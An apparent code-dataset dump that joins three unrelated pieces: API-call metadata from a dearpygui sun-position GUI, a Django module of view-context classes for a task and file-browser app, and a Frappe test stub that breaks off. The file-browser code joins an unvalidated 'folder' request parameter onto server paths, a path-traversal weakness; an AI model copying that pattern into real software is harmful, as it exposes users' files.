(['dpg.mvXAxis'], {'label': '"""Hora [h]"""', 'tag': '(2211)', 'parent': '(2210)', 'time': '(True)', 'no_tick_labels': '(True)'}), "(dpg.mvXAxis, label='Hora [h]', tag=2211, parent=2210,\n time=True, no_tick_labels=True)\n", (9387, 9477), True, 'import dearpygui.dearpygui as dpg\n'), ((9514, 9587), 'dearpygui.dearpygui.add_plot_axis', 'dpg.add_plot_axis', (['dpg.mvYAxis'], {'label': '"""Angulo [º]"""', 'tag': '(2212)', 'parent': '(2210)'}), "(dpg.mvYAxis, label='Angulo [º]', tag=2212, parent=2210)\n", (9531, 9587), True, 'import dearpygui.dearpygui as dpg\n'), ((9623, 9653), 'dearpygui.dearpygui.set_axis_limits_auto', 'dpg.set_axis_limits_auto', (['(2211)'], {}), '(2211)\n', (9647, 9653), True, 'import dearpygui.dearpygui as dpg\n'), ((9675, 9709), 'dearpygui.dearpygui.set_axis_limits', 'dpg.set_axis_limits', (['(2212)', '(-5)', '(370)'], {}), '(2212, -5, 370)\n', (9694, 9709), True, 'import dearpygui.dearpygui as dpg\n'), ((9736, 9807), 'dearpygui.dearpygui.add_line_series', 'dpg.add_line_series', (['[]', '[]'], {'tag': '(2213)', 'label': '"""Rota diária"""', 'parent': '(2212)'}), "([], [], tag=2213, label='Rota diária', parent=2212)\n", (9755, 9807), True, 'import dearpygui.dearpygui as dpg\n'), ((9843, 9917), 'dearpygui.dearpygui.add_scatter_series', 'dpg.add_scatter_series', (['[]', '[]'], {'tag': '(2214)', 'label': '"""Ponto atual"""', 'parent': '(2212)'}), "([], [], tag=2214, label='Ponto atual', parent=2212)\n", (9865, 9917), True, 'import dearpygui.dearpygui as dpg\n'), ((9960, 10049), 'dearpygui.dearpygui.plot', 'dpg.plot', ([], {'tag': '(2220)', 'label': '"""Altitude do dia"""', 'height': '(312)', 'width': '(478)', 'anti_aliased': '(True)'}), "(tag=2220, label='Altitude do dia', height=312, width=478,\n anti_aliased=True)\n", (9968, 10049), True, 'import dearpygui.dearpygui as dpg\n'), ((10079, 10186), 'dearpygui.dearpygui.add_plot_axis', 'dpg.add_plot_axis', (['dpg.mvXAxis'], {'label': '"""Hora [h]"""', 'tag': '(2221)', 'parent': '(2220)', 'time': '(True)', 'no_tick_labels': '(True)'}), "(dpg.mvXAxis, label='Hora [h]', tag=2221, parent=2220,\n time=True, no_tick_labels=True)\n", (10096, 10186), True, 'import dearpygui.dearpygui as dpg\n'), ((10223, 10296), 'dearpygui.dearpygui.add_plot_axis', 'dpg.add_plot_axis', (['dpg.mvYAxis'], {'label': '"""Angulo [º]"""', 'tag': '(2222)', 'parent': '(2220)'}), "(dpg.mvYAxis, label='Angulo [º]', tag=2222, parent=2220)\n", (10240, 10296), True, 'import dearpygui.dearpygui as dpg\n'), ((10332, 10362), 'dearpygui.dearpygui.set_axis_limits_auto', 'dpg.set_axis_limits_auto', (['(2221)'], {}), '(2221)\n', (10356, 10362), True, 'import dearpygui.dearpygui as dpg\n'), ((10384, 10418), 'dearpygui.dearpygui.set_axis_limits', 'dpg.set_axis_limits', (['(2222)', '(-5)', '(100)'], {}), '(2222, -5, 100)\n', (10403, 10418), True, 'import dearpygui.dearpygui as dpg\n'), ((10445, 10466), 'dearpygui.dearpygui.add_plot_legend', 'dpg.add_plot_legend', ([], {}), '()\n', (10464, 10466), True, 'import dearpygui.dearpygui as dpg\n'), ((10483, 10554), 'dearpygui.dearpygui.add_line_series', 'dpg.add_line_series', (['[]', '[]'], {'tag': '(2223)', 'label': '"""Rota diária"""', 'parent': '(2222)'}), "([], [], tag=2223, label='Rota diária', parent=2222)\n", (10502, 10554), True, 'import dearpygui.dearpygui as dpg\n'), ((10590, 10664), 'dearpygui.dearpygui.add_scatter_series', 'dpg.add_scatter_series', (['[]', '[]'], {'tag': '(2224)', 'label': '"""Ponto atual"""', 'parent': '(2222)'}), "([], [], tag=2224, label='Ponto atual', parent=2222)\n", (10612, 10664), True, 'import dearpygui.dearpygui as dpg\n'), ((11233, 11286), 'dearpygui.dearpygui.menu_bar', 'dpg.menu_bar', ([], {'tag': '(2301)', 'label': '"""menubar para datetime"""'}), "(tag=2301, label='menubar para datetime')\n", (11245, 11286), True, 'import dearpygui.dearpygui as dpg\n'), ((11789, 11815), 'dearpygui.dearpygui.child_window', 'dpg.child_window', ([], {'tag': '(2310)'}), '(tag=2310)\n', (11805, 11815), True, 'import dearpygui.dearpygui as dpg\n'), ((11898, 11943), 'dearpygui.dearpygui.add_text', 'dpg.add_text', ([], {'default_value': '"""Hora automática"""'}), "(default_value='Hora automática')\n", (11910, 11943), True, 'import dearpygui.dearpygui as dpg\n'), ((11963, 12100), 'dearpygui.dearpygui.add_drag_floatx', 'dpg.add_drag_floatx', ([], {'tag': '(231)', 'label': '"""Ano/Mes/Dia Auto"""', 'size': '(3)', 'format': '"""%.0f"""', 'speed': '(0.1)', 'min_value': '(1)', 'max_value': '(3000)', 'no_input': '(True)'}), "(tag=231, label='Ano/Mes/Dia Auto', size=3, format=\n '%.0f', speed=0.1, min_value=1, max_value=3000, no_input=True)\n", (11982, 12100), True, 'import dearpygui.dearpygui as dpg\n'), ((12140, 12249), 'dearpygui.dearpygui.add_drag_floatx', 'dpg.add_drag_floatx', ([], {'tag': '(232)', 'label': '"""Hora/Min/Sec Auto"""', 'size': '(3)', 'format': '"""%.0f"""', 'speed': '(0.1)', 'no_input': '(True)'}), "(tag=232, label='Hora/Min/Sec Auto', size=3, format=\n '%.0f', speed=0.1, no_input=True)\n", (12159, 12249), True, 'import dearpygui.dearpygui as dpg\n'), ((12355, 12520), 'dearpygui.dearpygui.add_drag_int', 'dpg.add_drag_int', ([], {'tag': '(233)', 'label': '"""Valor no dia"""', 'format': '"""%.0f"""', 'speed': '(0.1)', 'min_value': '(0)', 'max_value': '(26 * 3600)', 'no_input': '(True)', 'source': 'TOT_SECONDS', 'enabled': '(False)'}), "(tag=233, label='Valor no dia', format='%.0f', speed=0.1,\n min_value=0, max_value=26 * 3600, no_input=True, source=TOT_SECONDS,\n enabled=False)\n", (12371, 12520), True, 'import dearpygui.dearpygui as dpg\n'), ((12570, 12728), 'dearpygui.dearpygui.add_drag_int', 'dpg.add_drag_int', ([], {'tag': '(234)', 'label': '"""Dia Juliano"""', 'format': '"""%.0f"""', 'speed': '(0.1)', 'min_value': '(0)', 'max_value': '(366)', 'no_input': '(True)', 'source': 'JULIANSDAY', 'enabled': '(False)'}), "(tag=234, label='Dia Juliano', format='%.0f', speed=0.1,\n min_value=0, max_value=366, no_input=True, source=JULIANSDAY, enabled=False\n )\n", (12586, 12728), True, 'import dearpygui.dearpygui as dpg\n'), ((12798, 12824), 'dearpygui.dearpygui.child_window', 'dpg.child_window', ([], {'tag': '(2320)'}), '(tag=2320)\n', (12814, 12824), True, 'import dearpygui.dearpygui as dpg\n'), ((12905, 12946), 'dearpygui.dearpygui.add_text', 'dpg.add_text', ([], {'default_value': '"""Hora manual"""'}), "(default_value='Hora manual')\n", (12917, 12946), True, 'import dearpygui.dearpygui as dpg\n'), ((12966, 13109), 'dearpygui.dearpygui.add_input_floatx', 'dpg.add_input_floatx', ([], {'tag': '(236)', 'label': '"""Ano/Mes/Dia Manual"""', 'size': '(3)', 'default_value': '[2020, 12, 25]', 'format': '"""%.0f"""', 'min_value': '(1)', 'max_value': '(3000)'}), "(tag=236, label='Ano/Mes/Dia Manual', size=3,\n default_value=[2020, 12, 25], format='%.0f', min_value=1, max_value=3000)\n", (12986, 13109), True, 'import dearpygui.dearpygui as dpg\n'), ((13138, 13278), 'dearpygui.dearpygui.add_input_floatx', 'dpg.add_input_floatx', ([], {'tag': '(237)', 'label': '"""Hora/Min/Sec Manual"""', 'size': '(3)', 'default_value': '[20, 30, 10]', 'format': '"""%.0f"""', 'min_value': '(1)', 'max_value': '(60)'}), "(tag=237, label='Hora/Min/Sec Manual', size=3,\n default_value=[20, 30, 10], format='%.0f', min_value=1, max_value=60)\n", (13158, 13278), True, 'import dearpygui.dearpygui as dpg\n'), ((13310, 13475), 'dearpygui.dearpygui.add_drag_int', 'dpg.add_drag_int', ([], {'tag': '(238)', 'label': '"""Valor no dia"""', 'format': '"""%.0f"""', 'speed': '(0.1)', 'min_value': '(0)', 'max_value': '(24 * 3600)', 'no_input': '(True)', 'source': 'TOT_SECONDS', 'enabled': '(False)'}), "(tag=238, label='Valor no dia', format='%.0f', speed=0.1,\n min_value=0, max_value=24 * 3600, no_input=True, source=TOT_SECONDS,\n enabled=False)\n", (13326, 13475), True, 'import dearpygui.dearpygui as dpg\n'), ((13515, 13668), 'dearpygui.dearpygui.add_drag_int', 'dpg.add_drag_int', ([], {'tag': '(239)', 'label': '"""<NAME>"""', 'format': '"""%.0f"""', 'speed': '(0.1)', 'min_value': '(0)', 'max_value': '(366)', 'no_input': '(True)', 'source': 'JULIANSDAY', 'enabled': '(False)'}), "(tag=239, label='<NAME>', format='%.0f', speed=0.1,\n min_value=0, max_value=366, no_input=True, source=JULIANSDAY, enabled=False\n )\n", (13531, 13668), True, 'import dearpygui.dearpygui as dpg\n'), ((13712, 13731), 'dearpygui.dearpygui.hide_item', 'dpg.hide_item', (['(2320)'], {}), '(2320)\n', (13725, 13731), True, 'import dearpygui.dearpygui as dpg\n'), ((13779, 13798), 'dearpygui.dearpygui.hide_item', 'dpg.hide_item', (['(2310)'], {}), '(2310)\n', (13792, 13798), True, 'import dearpygui.dearpygui as dpg\n'), ((14007, 14034), 'dearpygui.dearpygui.child_window', 'dpg.child_window', ([], {'height': '(90)'}), '(height=90)\n', (14023, 14034), True, 'import dearpygui.dearpygui as dpg\n'), ((14058, 14128), 'dearpygui.dearpygui.add_text', 'dpg.add_text', ([], {'default_value': '"""Definições de longitude e latitude local"""'}), "(default_value='Definições de longitude e latitude local')\n", (14070, 14128), True, 'import dearpygui.dearpygui as dpg\n'), ((14382, 14398), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {}), '()\n', (14396, 14398), True, 'import dearpygui.dearpygui as dpg\n'), ((14704, 14732), 'dearpygui.dearpygui.child_window', 'dpg.child_window', ([], {'height': '(150)'}), '(height=150)\n', (14720, 14732), True, 'import dearpygui.dearpygui as dpg\n'), ((14793, 14841), 'dearpygui.dearpygui.add_text', 'dpg.add_text', ([], {'default_value': '"""Informacoes do sol"""'}), "(default_value='Informacoes do sol')\n", (14805, 14841), True, 'import dearpygui.dearpygui as dpg\n'), ((14868, 14973), 'dearpygui.dearpygui.add_drag_float', 'dpg.add_drag_float', ([], {'label': '"""Azimute"""', 'tag': '(2312)', 'format': '"""%4.2f"""', 'speed': '(1)', 'no_input': '(True)', 'source': 'AZIMUTE'}), "(label='Azimute', tag=2312, format='%4.2f', speed=1,\n no_input=True, source=AZIMUTE)\n", (14886, 14973), True, 'import dearpygui.dearpygui as dpg\n'), ((15008, 15024), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {}), '()\n', (15022, 15024), True, 'import dearpygui.dearpygui as dpg\n'), ((15047, 15152), 'dearpygui.dearpygui.add_drag_float', 'dpg.add_drag_float', ([], {'label': '"""Altitude"""', 'tag': '(2313)', 'format': '"""%4.2f"""', 'speed': '(1)', 'no_input': '(True)', 'source': 'ZENITE'}), "(label='Altitude', tag=2313, format='%4.2f', speed=1,\n no_input=True, source=ZENITE)\n", (15065, 15152), True, 'import dearpygui.dearpygui as dpg\n'), ((15187, 15203), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {}), '()\n', (15201, 15203), True, 'import dearpygui.dearpygui as dpg\n'), ((15226, 15337), 'dearpygui.dearpygui.add_drag_float', 'dpg.add_drag_float', ([], {'label': '"""Elevação (m)"""', 'tag': '(2314)', 'format': '"""%4.0f"""', 'speed': '(1)', 'no_input': '(True)', 'source': 'ALTITUDE'}), "(label='Elevação (m)', tag=2314, format='%4.0f', speed=1,\n no_input=True, source=ALTITUDE)\n", (15244, 15337), True, 'import dearpygui.dearpygui as dpg\n'), ((15367, 15383), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {}), '()\n', (15381, 15383), True, 'import dearpygui.dearpygui as dpg\n'), ((15406, 15499), 'dearpygui.dearpygui.add_drag_floatx', 'dpg.add_drag_floatx', ([], {'label': '"""Horas de sol"""', 'tag': '(2315)', 'size': '(3)', 'format': '"""%.0f"""', 'no_input': '(True)'}), "(label='Horas de sol', tag=2315, size=3, format='%.0f',\n no_input=True)\n", (15425, 15499), True, 'import dearpygui.dearpygui as dpg\n'), ((15581, 15609), 'dearpygui.dearpygui.child_window', 'dpg.child_window', ([], {'height': '(200)'}), '(height=200)\n', (15597, 15609), True, 'import dearpygui.dearpygui as dpg\n'), ((15671, 15722), 'dearpygui.dearpygui.add_text', 'dpg.add_text', ([], {'default_value': '"""Posicoes de interesse"""'}), "(default_value='Posicoes de interesse')\n", (15683, 15722), True, 'import dearpygui.dearpygui as dpg\n'), ((15751, 15805), 'dearpygui.dearpygui.add_text', 'dpg.add_text', ([], {'default_value': '"""Nascer do sol (hh/mm/ss)"""'}), "(default_value='Nascer do sol (hh/mm/ss)')\n", (15763, 15805), True, 'import dearpygui.dearpygui as dpg\n'), ((16021, 16037), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {}), '()\n', (16035, 16037), True, 'import dearpygui.dearpygui as dpg\n'), ((16060, 16111), 'dearpygui.dearpygui.add_text', 'dpg.add_text', ([], {'default_value': '"""Culminante (hh/mm/ss)"""'}), "(default_value='Culminante (hh/mm/ss)')\n", (16072, 16111), True, 'import dearpygui.dearpygui as dpg\n'), ((16330, 16346), 'dearpygui.dearpygui.add_spacer', 'dpg.add_spacer', ([], {}), '()\n', (16344, 16346), True, 'import dearpygui.dearpygui as dpg\n'), ((16369, 16420), 'dearpygui.dearpygui.add_text', 'dpg.add_text', ([], {'default_value': '"""Por do sol (hh/mm/ss)"""'}), "(default_value='Por do sol (hh/mm/ss)')\n", (16381, 16420), True, 'import dearpygui.dearpygui as dpg\n'), ((467, 480), 'math.cos', 'math.cos', (['ang'], {}), '(ang)\n', (475, 480), False, 'import math\n'), ((501, 514), 'math.sin', 'math.sin', (['ang'], {}), '(ang)\n', (509, 514), False, 'import math\n'), ((1447, 1458), 'math.cos', 'math.cos', (['x'], {}), '(x)\n', (1455, 1458), False, 'import math\n'), ((1670, 1686), 'math.sin', 'math.sin', (['sun[0]'], {}), '(sun[0])\n', (1678, 1686), False, 'import math\n'), ((1687, 1703), 'math.cos', 'math.cos', (['sun[1]'], {}), '(sun[1])\n', (1695, 1703), False, 'import math\n'), ((5266, 5277), 'math.cos', 'math.cos', (['x'], {}), '(x)\n', (5274, 5277), False, 'import math\n'), ((5493, 5509), 'math.sin', 'math.sin', (['sun[0]'], {}), '(sun[0])\n', (5501, 5509), False, 'import math\n'), ((5510, 5526), 'math.cos', 'math.cos', (['sun[1]'], {}), '(sun[1])\n', (5518, 5526), False, 'import math\n'), ((13738, 13764), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['HORA_MANUAL'], {}), '(HORA_MANUAL)\n', (13751, 13764), True, 'import dearpygui.dearpygui as dpg\n'), ((18161, 18180), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['YEAR'], {}), '(YEAR)\n', (18174, 18180), True, 'import dearpygui.dearpygui as dpg\n'), ((18182, 18202), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['MONTH'], {}), '(MONTH)\n', (18195, 18202), True, 'import dearpygui.dearpygui as dpg\n'), ((18205, 18223), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['DAY'], {}), '(DAY)\n', (18218, 18223), True, 'import dearpygui.dearpygui as dpg\n'), ((18289, 18308), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['HOUR'], {}), '(HOUR)\n', (18302, 18308), True, 'import dearpygui.dearpygui as dpg\n'), ((18310, 18331), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['MINUTE'], {}), '(MINUTE)\n', (18323, 18331), True, 'import dearpygui.dearpygui as dpg\n'), ((18333, 18354), 'dearpygui.dearpygui.get_value', 'dpg.get_value', (['SECOND'], {}), '(SECOND)\n', (18346, 18354), True, 'import dearpygui.dearpygui as dpg\n'), ((1474, 1485), 'math.sin', 'math.sin', (['x'], {}), '(x)\n', (1482, 1485), False, 'import math\n'), ((1486, 1497), 'math.cos', 'math.cos', (['y'], {}), '(y)\n', (1494, 1497), False, 'import math\n'), ((2082, 2109), 'math.cos', 'math.cos', (['(azi - math.pi / 2)'], {}), '(azi - math.pi / 2)\n', (2090, 2109), False, 'import math\n'), ((2121, 2148), 'math.sin', 'math.sin', (['(azi - math.pi / 2)'], {}), '(azi - math.pi / 2)\n', (2129, 2148), False, 'import math\n'), ((2327, 2354), 'math.cos', 'math.cos', (['(alt - math.pi / 2)'], {}), '(alt - math.pi / 2)\n', (2335, 2354), False, 'import math\n'), ((2366, 2393), 'math.sin', 'math.sin', (['(alt - math.pi / 2)'], {}), '(alt - math.pi / 2)\n', (2374, 2393), False, 'import math\n'), ((5293, 5304), 'math.sin', 'math.sin', (['x'], {}), '(x)\n', (5301, 5304), False, 'import math\n'), ((5305, 5316), 'math.cos', 'math.cos', (['y'], {}), '(y)\n', (5313, 5316), False, 'import math\n'), ((5809, 5836), 'math.cos', 'math.cos', (['(azi - math.pi / 2)'], {}), '(azi - math.pi / 2)\n', (5817, 5836), False, 'import math\n'), ((5848, 5875), 'math.sin', 'math.sin', (['(azi - math.pi / 2)'], {}), '(azi - math.pi / 2)\n', (5856, 5875), False, 'import math\n'), ((5972, 5999), 'math.cos', 'math.cos', (['(alt - math.pi / 2)'], {}), '(alt - math.pi / 2)\n', (5980, 5999), False, 'import math\n'), ((6011, 6038), 'math.sin', 'math.sin', (['(alt - math.pi / 2)'], {}), '(alt - math.pi / 2)\n', (6019, 6038), False, 'import math\n'), ((11399, 11432), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['HORA_MANUAL', '(False)'], {}), '(HORA_MANUAL, False)\n', (11412, 11432), True, 'import dearpygui.dearpygui as dpg\n'), ((11644, 11676), 'dearpygui.dearpygui.set_value', 'dpg.set_value', (['HORA_MANUAL', '(True)'], {}), '(HORA_MANUAL, True)\n', (11657, 11676), True, 'import dearpygui.dearpygui as dpg\n')] |
import os, time, mimetypes, glob
from django.utils.translation import gettext_lazy as _
from django.urls import reverse
from task.const import *
from task.models import Task, detect_group
from rusel.base.config import Config
from rusel.base.forms import CreateGroupForm
from rusel.context import get_base_context
from rusel.utils import extract_get_params
class Context:
def set_config(self, config, cur_view):
self.config = Config(config, cur_view)
def get_app_context(self, user_id, search_qty=None, icon=None, nav_items=None, **kwargs):
context = {}
if hasattr(self, 'object') and self.object:
title = self.object.name
else:
if 'title' in kwargs:
title = kwargs['title']
else:
title = _(self.config.title).capitalize()
nav_item = None
if (Task.get_nav_role(self.config.app) != self.config.get_cur_role()):
nav_item = Task.get_active_nav_item(user_id, self.config.app)
if nav_item:
title = (title, nav_item.name)
context['nav_item'] = nav_item
context.update(get_base_context(self.request, self.config.app, self.config.get_cur_role(), self.config.cur_view_group, (hasattr(self, 'object') and self.object != None), title, icon=icon))
context['fix_list'] = self.get_fixes(self.config.views, search_qty)
context['group_form'] = CreateGroupForm()
context['config'] = self.config
context['params'] = extract_get_params(self.request, self.config.group_entity)
if nav_items:
context['nav_items'] = nav_items
context['add_item_placeholder'] = '{} {}'.format(_('add').capitalize(), self.config.item_name if self.config.item_name else self.config.get_cur_role())
if self.config.add_button:
context['add_item_template'] = 'base/add_item_button.html'
else:
context['add_item_template'] = 'base/add_item_input.html'
if (self.config.group_entity in self.request.GET):
context['current_group'] = self.request.GET[self.config.group_entity]
elif ('ret' in self.request.GET):
context['current_group'] = self.request.GET['ret']
return context
def get_sorts(self, sorts):
ret = []
for sort in sorts:
ret.append({'id': sort[0], 'name': _(sort[1]).capitalize()})
return ret
def get_fixes(self, views, search_qty):
fixes = []
if (self.config.app == APP_ALL):
common_url = reverse('index')
else:
common_url = reverse(self.config.app + ':list')
nav_item=Task.get_active_nav_item(self.request.user.id, self.config.app)
for key, value in views.items():
url = common_url
determinator = 'view'
view_id = self.config.main_view
if (view_id != key):
if ('role' in value):
determinator = 'role'
view_id = value['role']
url += view_id + '/'
else:
view_id = key
if (key != self.config.main_view):
if ('page_url' in value):
url += value['page_url'] + '/'
else:
url += '?view=' + key
if (self.config.app in FOLDER_NAV_APPS):
folder = ''
if ('folder' in self.request.GET):
folder = self.request.GET['folder']
if folder:
if ('?' in url):
url += '&'
else:
url += '?'
url += 'folder=' + folder
hide_qty = False
if ('hide_qty' in value):
hide_qty = value['hide_qty']
if hide_qty:
qty = None
else:
if (view_id == self.config.group_entity):
_nav_item = None
else:
_nav_item = nav_item
fix_group = detect_group(self.request.user, self.config.app, determinator, view_id, _(value['title']).capitalize())
qty = self.get_view_qty(fix_group, _nav_item)
active = (self.config.cur_view_group.determinator == determinator) and (self.config.cur_view_group.view_id == view_id)
fix = {
'determinator': determinator,
'id': view_id,
'url': url,
'icon': value['icon'],
'title': _(value['title']).capitalize(),
'qty': qty,
'active': active,
'search_qty': search_qty,
}
fixes.append(fix)
return fixes
def get_view_qty(self, group, nav_item):
data = self.get_dataset(group, nav_item=nav_item)
return len(data)
def get_dataset(self, group, query=None, nav_item=None):
if (group.determinator == 'role'):
cur_role = group.view_id
else:
cur_role = self.config.base_role
data = Task.get_role_tasks(self.request.user.id, self.config.app, cur_role, nav_item)
if (self.config.app == APP_ALL) and (not query):
return data
if data and ((not group.determinator) or (group.determinator == 'group')):
data = data.filter(groups__id=group.id)
# if (not group.completed):
# data = data.filter(completed=False)
if hasattr(self, 'tune_dataset'):
return self.tune_dataset(data, group)
return data
def get_nav_items(self):
nav_role = Task.get_nav_role(self.config.app)
if (not nav_role) or (nav_role == self.config.cur_view_group.view_id):
return None
href = self.request.path
if ('pk' in self.kwargs):
pk = str(self.kwargs['pk']) + '/'
if (pk in href):
href = href.split(pk)[0]
sort = 'name'
nav_item_group = detect_group(self.request.user, self.config.app, 'role', nav_role, '')
if nav_item_group and nav_item_group.items_sort:
sort = nav_item_group.items_sort
ret = []
for item in Task.get_role_tasks(self.request.user.id, self.config.app, nav_role).order_by(sort):
ret.append({
'id': item.id,
'name': item.name,
'qty': len(Task.get_role_tasks(self.request.user.id, self.config.app, self.config.cur_view_group.view_id, item)),
'href': href,
})
return ret
class DirContext(Context):
def get_context_data(self, **kwargs):
self.config.set_view(self.request)
self.object = None
self.cur_folder = ''
page_title = ''
title = ''
if ('folder' in self.request.GET):
self.cur_folder = self.request.GET['folder']
page_title = self.cur_folder.split('/')[-1:][0]
title = self.cur_folder
if not self.cur_folder:
page_title = _(self.config.app_title)
title = page_title
kwargs.update({'title': page_title})
dir_tree = []
self.scan_dir_tree(dir_tree, self.cur_folder, self.store_dir.rstrip('/'))
self.scan_files()
self.object = None
context = super().get_context_data(**kwargs)
upd_context = self.get_app_context(self.request.user.id, None, icon=self.config.view_icon, nav_items=None, **kwargs)
context.update(upd_context)
context['title'] = title
context['dir_tree'] = dir_tree
context['file_list'] = self.file_list
context['gps_data'] = self.gps_data
if (self.config.cur_view_group.determinator == 'view') and (self.config.cur_view_group.view_id != self.config.main_view):
context['cur_view'] = self.config.cur_view_group.view_id
context['theme_id'] = 24
context['cur_folder'] = self.cur_folder
return context
def scan_dir_tree(self, dir_tree, cur_folder, path, parent=None, demo=False):
ld = glob.glob(path + '/*/')
if not len(ld):
return
node = ''
level = 0
if parent:
node = parent['node']
if node:
node += '/'
node += parent['name']
level = parent['level'] + 1
s_node = node
if node:
s_node = node + '/'
p = path
for d in ld:
dd = d.replace('\\', '/')
name = dd.split(p)[1].strip('/')
x = {
'node': node,
'name': name,
'active': (cur_folder == s_node + name),
'level': level,
'qty': 0,
}
dir_tree.append(x)
if not demo:
self.scan_dir_tree(dir_tree, cur_folder, path + '/' + name, x)
def scan_files(self):
self.gps_data = []
self.file_list = []
with os.scandir(self.store_dir + self.cur_folder) as it:
for entry in it:
if (entry.name.upper() == 'Thumbs.db'.upper()):
continue
if entry.is_dir():
continue
ff = self.store_dir + self.cur_folder + '/' + entry.name
mt = mimetypes.guess_type(ff)
file_type = ''
if mt and mt[0]:
file_type = mt[0]
self.file_list.append({
'name': entry.name,
'href': 'file/?folder=' + self.cur_folder + '&file=' + entry.name,
'date': time.ctime(os.path.getmtime(ff)),
'type': file_type,
'size': self.sizeof_fmt(os.path.getsize(ff)),
})
return self.gps_data
def sizeof_fmt(self, num, suffix='B'):
for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1024.0:
return f'{num:3.1f}{unit}{suffix}'
num /= 1024.0
return f'{num:.1f}Yi{suffix}'
| [
"os.path.getsize",
"task.models.detect_group",
"rusel.base.forms.CreateGroupForm",
"django.utils.translation.gettext_lazy",
"task.models.Task.get_role_tasks",
"rusel.base.config.Config",
"rusel.utils.extract_get_params",
"os.scandir",
"django.urls.reverse",
"mimetypes.guess_type",
"os.path.getmt... | [((438, 462), 'rusel.base.config.Config', 'Config', (['config', 'cur_view'], {}), '(config, cur_view)\n', (444, 462), False, 'from rusel.base.config import Config\n'), ((1433, 1450), 'rusel.base.forms.CreateGroupForm', 'CreateGroupForm', ([], {}), '()\n', (1448, 1450), False, 'from rusel.base.forms import CreateGroupForm\n'), ((1519, 1577), 'rusel.utils.extract_get_params', 'extract_get_params', (['self.request', 'self.config.group_entity'], {}), '(self.request, self.config.group_entity)\n', (1537, 1577), False, 'from rusel.utils import extract_get_params\n'), ((2673, 2736), 'task.models.Task.get_active_nav_item', 'Task.get_active_nav_item', (['self.request.user.id', 'self.config.app'], {}), '(self.request.user.id, self.config.app)\n', (2697, 2736), False, 'from task.models import Task, detect_group\n'), ((5185, 5263), 'task.models.Task.get_role_tasks', 'Task.get_role_tasks', (['self.request.user.id', 'self.config.app', 'cur_role', 'nav_item'], {}), '(self.request.user.id, self.config.app, cur_role, nav_item)\n', (5204, 5263), False, 'from task.models import Task, detect_group\n'), ((5747, 5781), 'task.models.Task.get_nav_role', 'Task.get_nav_role', (['self.config.app'], {}), '(self.config.app)\n', (5764, 5781), False, 'from task.models import Task, detect_group\n'), ((6115, 6185), 'task.models.detect_group', 'detect_group', (['self.request.user', 'self.config.app', '"""role"""', 'nav_role', '""""""'], {}), "(self.request.user, self.config.app, 'role', nav_role, '')\n", (6127, 6185), False, 'from task.models import Task, detect_group\n'), ((8203, 8226), 'glob.glob', 'glob.glob', (["(path + '/*/')"], {}), "(path + '/*/')\n", (8212, 8226), False, 'import os, time, mimetypes, glob\n'), ((868, 902), 'task.models.Task.get_nav_role', 'Task.get_nav_role', (['self.config.app'], {}), '(self.config.app)\n', (885, 902), False, 'from task.models import Task, detect_group\n'), ((958, 1008), 'task.models.Task.get_active_nav_item', 'Task.get_active_nav_item', (['user_id', 'self.config.app'], {}), '(user_id, self.config.app)\n', (982, 1008), False, 'from task.models import Task, detect_group\n'), ((2565, 2581), 'django.urls.reverse', 'reverse', (['"""index"""'], {}), "('index')\n", (2572, 2581), False, 'from django.urls import reverse\n'), ((2621, 2655), 'django.urls.reverse', 'reverse', (["(self.config.app + ':list')"], {}), "(self.config.app + ':list')\n", (2628, 2655), False, 'from django.urls import reverse\n'), ((7170, 7194), 'django.utils.translation.gettext_lazy', '_', (['self.config.app_title'], {}), '(self.config.app_title)\n', (7171, 7194), True, 'from django.utils.translation import gettext_lazy as _\n'), ((9120, 9164), 'os.scandir', 'os.scandir', (['(self.store_dir + self.cur_folder)'], {}), '(self.store_dir + self.cur_folder)\n', (9130, 9164), False, 'import os, time, mimetypes, glob\n'), ((6325, 6393), 'task.models.Task.get_role_tasks', 'Task.get_role_tasks', (['self.request.user.id', 'self.config.app', 'nav_role'], {}), '(self.request.user.id, self.config.app, nav_role)\n', (6344, 6393), False, 'from task.models import Task, detect_group\n'), ((9452, 9476), 'mimetypes.guess_type', 'mimetypes.guess_type', (['ff'], {}), '(ff)\n', (9472, 9476), False, 'import os, time, mimetypes, glob\n'), ((1702, 1710), 'django.utils.translation.gettext_lazy', '_', (['"""add"""'], {}), "('add')\n", (1703, 1710), True, 'from django.utils.translation import gettext_lazy as _\n'), ((798, 818), 'django.utils.translation.gettext_lazy', '_', (['self.config.title'], {}), '(self.config.title)\n', (799, 818), True, 'from django.utils.translation import gettext_lazy as _\n'), ((4634, 4651), 'django.utils.translation.gettext_lazy', '_', (["value['title']"], {}), "(value['title'])\n", (4635, 4651), True, 'from django.utils.translation import gettext_lazy as _\n'), ((6530, 6635), 'task.models.Task.get_role_tasks', 'Task.get_role_tasks', (['self.request.user.id', 'self.config.app', 'self.config.cur_view_group.view_id', 'item'], {}), '(self.request.user.id, self.config.app, self.config.\n cur_view_group.view_id, item)\n', (6549, 6635), False, 'from task.models import Task, detect_group\n'), ((2390, 2400), 'django.utils.translation.gettext_lazy', '_', (['sort[1]'], {}), '(sort[1])\n', (2391, 2400), True, 'from django.utils.translation import gettext_lazy as _\n'), ((4217, 4234), 'django.utils.translation.gettext_lazy', '_', (["value['title']"], {}), "(value['title'])\n", (4218, 4234), True, 'from django.utils.translation import gettext_lazy as _\n'), ((9786, 9806), 'os.path.getmtime', 'os.path.getmtime', (['ff'], {}), '(ff)\n', (9802, 9806), False, 'import os, time, mimetypes, glob\n'), ((9892, 9911), 'os.path.getsize', 'os.path.getsize', (['ff'], {}), '(ff)\n', (9907, 9911), False, 'import os, time, mimetypes, glob\n')] |
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Frappe Technologies Pvt. Ltd. and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestStockSettings(unittest.TestCase):
def setUp(self):
